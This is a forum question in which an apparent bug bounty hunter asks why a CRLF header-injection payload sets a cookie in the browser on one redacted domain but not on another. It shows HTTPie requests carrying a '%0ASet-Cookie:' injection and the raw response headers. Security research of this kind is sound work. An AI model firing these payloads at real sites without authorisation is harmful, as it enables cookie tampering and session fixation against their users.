Ok i am facing a very weird behaviour that sets and doesnt set cookie both. So, first i have found CRLF injection in 2 domains, redacted.de and redacted_another.com. When i go to redacted_another.com vulnerable url, the cookie gets set into firefox-esr. This works in browser. There first vulnerable domain i encountered had this url:
I can view cookies using developers tool. This is default behaviour as i think. The next domain i encountered had this vulnerable urls but it didnt work in browser 🙁 :
But when i visit this any urls from redacted.de it doest work in browser. Also, both redacted_another.com and redacted.de sets cookie in curl response. This is what it looks like for both redacted but the first one works in browser and second doesnt in browser. Working Curl request:
root@kali-linux:~/redacted/# http https://www.redacted.com/lp/%0ASet-Cookie:%20dipesh=yadav HTTP/2 301 date: Thu, 13 Aug 2020 15:02:53 GMT content-type: text/html content-length: 185 location: https://www.redacted.com/lp/redirects/?olp=/lp/ set-cookie: dipesh=yadav expires: Thu, 20 Aug 2020 15:02:53 GMT cache-control: max-age=604800 HTTP/2 200 date: Thu, 13 Aug 2020 15:02:53 GMT content-type: text/html content-length: 1452 vary: Accept-Encoding last-modified: Tue, 04 Feb 2020 15:54:26 GMT etag: "redacted" expires: Thu, 20 Aug 2020 15:02:53 GMT cache-control: max-age=604800 access-control-allow-origin: * accept-ranges: bytes
NOT WORKING REQUEST:
root@kali-linux:~/redacted# http http://www.redacted.de/sso/registration/account/%0aSet-Cookie:%20bugbounty=bugbountyplz HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 13 Aug 2020 15:05:04 GMT Content-Type: text/html Content-Length: 162 Location: https://www.redacted.de/sso/registration/account/ Set-Cookie: bugbounty=bugbountyplz Last-Modified: Thu, 13 Aug 2020 15:05:04 GMT Cache-Control: private Age: 0 X-Frame-Options: DENY X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Connection: keep-alive HTTP/2 200 server: nginx date: Thu, 13 Aug 2020 15:05:05 GMT content-type: text/html; charset=UTF-8 vary: Accept-Encoding access-control-allow-credentials: true access-control-allow-origin: https://www.redacted.de last-modified: Thu, 13 Aug 2020 15:05:05 GMT cache-control: no-cache, private age: 0 strict-transport-security: max-age=15768000 x-frame-options: DENY x-xss-protection: 1; mode=block x-content-type-options: nosniff accept-ranges: bytes
Can anyone help me with this? Whats the problem that doesnt letme set cookie in redacted.de but i can set cookie in redacted_another.com.